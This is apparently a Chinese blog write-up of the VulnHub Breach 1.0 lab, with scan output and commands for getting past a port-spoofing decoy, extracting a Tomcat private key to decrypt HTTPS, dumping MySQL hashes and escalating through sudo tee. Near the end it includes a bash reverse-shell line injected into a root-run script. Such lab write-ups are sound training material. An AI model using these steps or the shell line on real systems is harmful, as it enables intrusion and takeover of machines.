【VulnHub】breach1.0之技术积累_breach 1.0

实验环境：
攻击机1 ：192.168.110.141 （kalilinux）
靶机：192.168.110.140
这是一个中级难度的靶场，本打算按照前面的思路把流程写一下，最终决定只总结一下个人在此靶场渗透过程中遇到的难点与收获。

0x01 nmap扫描遇到IDS设备

• masscan快速扫描发现端口失败，nmap扫端口。

root@redwand:~# masscan -p0-65535 --rate=2000 192.168.110.140
Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2020-03-08 02:09:30 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 53/tcp on 192.168.110.140
1
2
3
4
5
6

• 换nmap扫端口几乎全开。

root@redwand:~# nmap -p1-1000 192.168.110.140
Starting Nmap 7.70 ( https://nmap.org ) at 2020-03-07 21:12 EST
Nmap scan report for 192.168.110.140
Host is up (0.00064s latency).
PORT     STATE SERVICE
1/tcp    open  tcpmux
2/tcp    open  compressnet
3/tcp    open  compressnet
4/tcp    open  unknown
5/tcp    open  rje
6/tcp    open  unknown
7/tcp    open  echo
8/tcp    open  unknown
9/tcp    open  discard
10/tcp   open  unknown
11/tcp   open  systat
12/tcp   open  unknown
13/tcp   open  daytime
14/tcp   open  unknown
15/tcp   open  netstat
16/tcp   open  unknown
17/tcp   open  qotd
18/tcp   open  msp
19/tcp   open  chargen
20/tcp   open  ftp-data
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
24/tcp   open  priv-mail
25/tcp   open  smtp
26/tcp   open  rsftp
27/tcp   open  nsw-fe
28/tcp   open  unknown
29/tcp   open  msg-icp
30/tcp   open  unknown
31/tcp   open  msg-auth
32/tcp   open  unknown
33/tcp   open  dsp
34/tcp   open  unknown
35/tcp   open  priv-print
36/tcp   open  unknown
37/tcp   open  time
38/tcp   open  rap
......
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

• 发现服务器有防止扫描的策略，改用nmap扫描方式-sN/sF/sX，探测到过滤端口。

root@redwand:~# nmap -sF -p1-65535 192.168.110.140
Starting Nmap 7.70 ( https://nmap.org ) at 2020-03-07 21:17 EST
Nmap scan report for 192.168.110.140
Host is up (0.00014s latency).
Not shown: 65532 closed ports
PORT     STATE         SERVICE
80/tcp   open|filtered http
4444/tcp open|filtered krb524
8443/tcp open|filtered https-alt
MAC Address: 08:00:27:C3:06:80 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 4.31 seconds
1
2
3
4
5
6
7
8
9
10
11

• 拿到root权限后，在后台查看，果然服务器在4444端口启用了portspoof端口隐藏插件。

root@Breach:~# netstat -anput
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      1038/portspoof
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      962/mysqld
tcp        0      0 192.168.110.140:55008   192.168.110.141:6666    ESTABLISHED 1530/bash
tcp6       0      0 :::80                   :::*                    LISTEN      1124/apache2
tcp6       0      0 :::8443                 :::*                    LISTEN      1247/java
tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN      1247/java
tcp6       0      0 192.168.110.140:59390   192.168.110.141:443     ESTABLISHED 1247/java
1
2
3
4
5
6
7
8
9
10

0x02 关于https私钥解密

• 使用keytool导出PKCS12格式的证书keystore

root@redwand:~# keytool -list -keystore keystore
Enter keystore password:
Keystore type: JKS
Keystore provider: SUN

Your keystore contains 1 entry

tomcat, May 20, 2016, PrivateKeyEntry,
Certificate fingerprint (SHA-256): F0:4A:E8:7F:52:C1:78:B4:14:2B:4D:D9:1A:34:31:F7:19:0A:29:F6:0C:85:00:0B:58:3A:37:20:6C:7E:E6:31

Warning:
The JKS keystore uses a proprietary format. It is recommended to migrate to PKCS12 which is an industry standard format using "keytool -importkeystore -srckeystore keystore -destkeystore keystore -deststoretype pkcs12".
root@redwand:~# keytool -importkeystore -srckeystore keystore -destkeystore keystore -deststoretype pkcs12
Enter source keystore password:
Entry for alias tomcat successfully imported.
Import command completed:  1 entries successfully imported, 0 entries failed or cancelled

Warning:
Migrated "keystore" to PKCS12. The JKS keystore is backed up as "keystore.old".
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

• 将pkcs12证书解析为无密码的私钥

root@redwand:~# openssl pkcs12 -in keystore -nocerts -nodes -out key.pem
1

• https私钥解密的条件，密钥交换算法不是DH类算法，详见上篇博客

0x03 8443端口无法访问

遇到问题如下图

解决方式，挂上burp代理后，得到burp签名的伪造证书，添加信任后成功访问。

0x03 提权过程的积累

• mysql -uroot -p空密码登陆mysql，得到milton加密密码。

mysql> select host,user,password from user;
select host,user,password from user;
+-----------+------------------+-------------------------------------------+
| host      | user             | password                                  |
+-----------+------------------+-------------------------------------------+
| localhost | root             |                                           |
|           | milton           | 6450d89bd3aff1d893b85d3ad65d2ec2          |
| 127.0.0.1 | root             |                                           |
| ::1       | root             |                                           |
| localhost | debian-sys-maint | *A9523939F1B2F3E72A4306C34F225ACF09590878 |
1
2
3
4
5
6
7
8
9
10

• tee命令在sudo配置下的提权。

blumbergh@Breach:~$echo "bash -c 'bash -i >& /dev/tcp/192.168.110.141/6666 0>&1'" | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
1

这里需要注意的是，此题目中的sudo配置不当，并不是使用sudo组的方式一加了之，而是做了sudo细化配置，如下所示。此方法家目录下也没有常规的.sudo_as_admin_seccessful文件，如果不是逐个登陆用户下使用sudo -l命令测试，很容易遗漏用户的sudo配置。

blumbergh@Breach:~$ sudo -l
sudo -l
Matching Defaults entries for blumbergh on Breach:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User blumbergh may run the following commands on Breach:
    (root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh
1
2
3
4
5
6
7
8